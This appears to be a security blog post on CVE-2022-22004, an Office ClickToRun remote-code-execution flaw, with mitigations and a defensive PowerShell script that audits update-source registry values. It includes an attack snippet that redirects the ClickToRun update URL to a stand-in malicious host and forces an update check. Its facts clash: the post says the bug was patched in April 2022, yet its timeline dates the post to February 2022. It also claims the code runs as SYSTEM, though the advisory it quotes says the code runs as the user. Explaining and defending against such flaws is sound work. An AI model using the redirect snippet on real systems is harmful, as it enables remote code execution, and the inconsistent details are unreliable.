In April 2022, Microsoft patched a critical vulnerability tracked as CVE-2022-22004. This bug affected Microsoft Office’s ClickToRun deployment technology and allowed attackers to execute code remotely on a victim's computer. Although it hasn't gotten as much press as some zero-days, CVE-2022-22004 is a real risk, especially for organizations where ClickToRun is enabled.
In this post, we’ll make sense of the details, see what’s at risk, look at how attackers can exploit it, and give you guidance to stay safe.
What is ClickToRun?
ClickToRun (C2R) is a service Microsoft uses to deliver and update Office apps quickly over the internet. Instead of copying over all files at once, it streams components as they’re needed.
Because C2R runs with system-level privileges and frequently fetches data from the internet, it can be a juicy target for attackers.
The Root Cause
The vulnerability is a remote code execution (RCE) bug in the way ClickToRun processes certain updates. Specifically, it fails to properly validate that the update source is trusted, which can allow attackers to inject arbitrary code.
According to Microsoft’s own advisory:
> *An attacker who successfully exploited this vulnerability could execute arbitrary code as the user running the affected application.*
If an attacker lures a user into downloading a malicious update or accessing a compromised server, it could trigger C2R to process and run attacker-supplied code.
Let’s break down a possible exploit scenario:
1. Preparation: The attacker creates a malicious Office update package or C2R manifest that includes harmful code.
2. Delivery: The attacker convinces the target to configure their Office installation to use the attacker's server (for example, via phishing, a fake support email, or social engineering).
3. Execution: When C2R fetches the updates from the malicious server, it executes the code in the context of the running user (potentially SYSTEM, if using elevated privileges).
Sample Exploit Snippet
Here’s a hypothetical example (for educational purposes only) that demonstrates how an attacker might point an Office instance to a malicious click-to-run server using PowerShell:
```powershell
# WARNING: DO NOT RUN THIS CODE!
# Imagine this as part of an attacker's script.

# Set the ClickToRun update source to the attacker's server
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Office\ClickToRun\Configuration" -Name "CDNBaseUrl" -Value "http://malicious-server.com/officecdn"

# Trigger an update check
Start-Process "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe" -ArgumentList "/update user"
```
If the vulnerability exists, and Office doesn't properly validate the source, it might download and execute malicious code delivered from malicious-server.com.
How Dangerous Is This?
- Privilege: Code runs as the user — if that user is an admin, the entire system can be compromised.
How To Protect Yourself
1. Patch Immediately: Microsoft fixed this in the April 2022 Patch Tuesday release. Update Office and Windows to the latest versions.
2. Block Malicious Traffic: Monitor and filter outbound traffic, especially to unknown update domains.
3. Least Privilege: Run everyday tasks with a non-admin account. Restrict who can change Office update settings.
4. User Training: Educate users about phishing and suspicious URLs.
5. Audit: Check your systems for custom or suspicious Office update sources.
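The audit step (and the allow-list it produces for the traffic-filtering step) can be scripted. The PowerShell below is an added example written for this post, not code from Microsoft or from the original article. It reads the same ClickToRun configuration key and `CDNBaseUrl` value the exploit snippet above tampers with, plus `UpdateUrl`, the value name the Office Deployment Tool writes for a custom update path; the allow-list containing `officecdn.microsoft.com` is an assumption to tune for your environment (for example, add your own internal update share).

```powershell
# Added example (not from the original post): audit the Click-to-Run update-source
# values on a Windows host and flag any origin that is not in an allow-list.
# Assumptions: the registry key and CDNBaseUrl come from the post above; UpdateUrl is
# the value name used for a custom update path set via the Office Deployment Tool;
# the allow-list below is a starting point you must adapt to your environment.

$C2RConfigKey = 'HKLM:\SOFTWARE\Microsoft\Office\ClickToRun\Configuration'

# Hostnames treated as legitimate Office update origins (assumed; extend as needed).
$AllowedUpdateHosts = @('officecdn.microsoft.com')

function Test-OfficeUpdateSource {
    <#
    .SYNOPSIS
      Emits one object per update-source value found under the C2R configuration key,
      with IsSuspicious set for any origin outside the allow-list.
    #>
    [CmdletBinding()]
    param(
        [string]$Path = $C2RConfigKey,
        [string[]]$AllowedHosts = $AllowedUpdateHosts,
        # Value names that control where C2R downloads updates from.
        [string[]]$ValueNames = @('CDNBaseUrl', 'UpdateUrl')
    )

    if (-not (Test-Path -Path $Path)) {
        Write-Warning "Click-to-Run configuration key not found: $Path (Office C2R may not be installed)"
        return
    }

    $props = Get-ItemProperty -Path $Path

    foreach ($name in $ValueNames) {
        $value = $props.$name
        if ([string]::IsNullOrWhiteSpace($value)) { continue }   # value not set on this host

        $suspicious = $true
        $reason     = 'origin not in allow-list'
        $hostName   = $null

        # A UNC path (\\server\share) is a valid custom source; report it for review
        # rather than silently trusting it.
        if ($value.StartsWith('\\')) {
            $reason = 'UNC update share configured; verify it is an approved internal share'
        }
        else {
            try {
                $uri      = [System.Uri]$value
                $hostName = $uri.Host
                if ($uri.Scheme -ne 'https' -and $uri.Scheme -ne 'http') {
                    $reason = "unexpected URI scheme '$($uri.Scheme)'"
                }
                elseif ($AllowedHosts -contains $hostName) {
                    $suspicious = $false
                    $reason     = 'origin in allow-list'
                }
            }
            catch {
                $reason = 'value is not a parseable URI'
            }
        }

        [pscustomobject]@{
            ValueName    = $name
            Value        = $value
            Host         = $hostName
            IsSuspicious = $suspicious
            Reason       = $reason
        }
    }
}

# Run the audit and show the result. Exit non-zero when something needs review so the
# script can be scheduled or pushed through endpoint management and alert on failure.
$findings = Test-OfficeUpdateSource
$findings | Format-Table -AutoSize

if ($findings | Where-Object IsSuspicious) {
    Write-Warning 'One or more Office update sources point outside the allow-list; review them before C2R next checks for updates.'
    exit 1
}
```

Run it from an elevated PowerShell session (reading `HKLM:` works unelevated, but you will typically want the same session to remediate). A value such as the `http://malicious-server.com/officecdn` shown in the exploit snippet is reported with `IsSuspicious = True`, while the default Microsoft CDN URL passes. Because the function also surfaces the allowed hostnames, the same list doubles as the basis for the outbound-traffic filtering in step 2.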
References and Further Reading
- Microsoft Security Advisory CVE-2022-22004
- Click-to-Run for Office Overview
- April 2022 Patch Tuesday Overview (BleepingComputer)
Conclusion
CVE-2022-22004 is a perfect reminder that even the tools we trust for regular software updates can be abused. Keeping your systems updated and following good security practices is more important than ever. Don’t wait—patch your Office systems, watch for suspicious update sources, and be vigilant!
Have thoughts or questions? Leave a comment below. Stay safe!
Timeline
Published on: 02/09/2022 17:15:00 UTC
Last modified on: 02/14/2022 21:23:00 UTC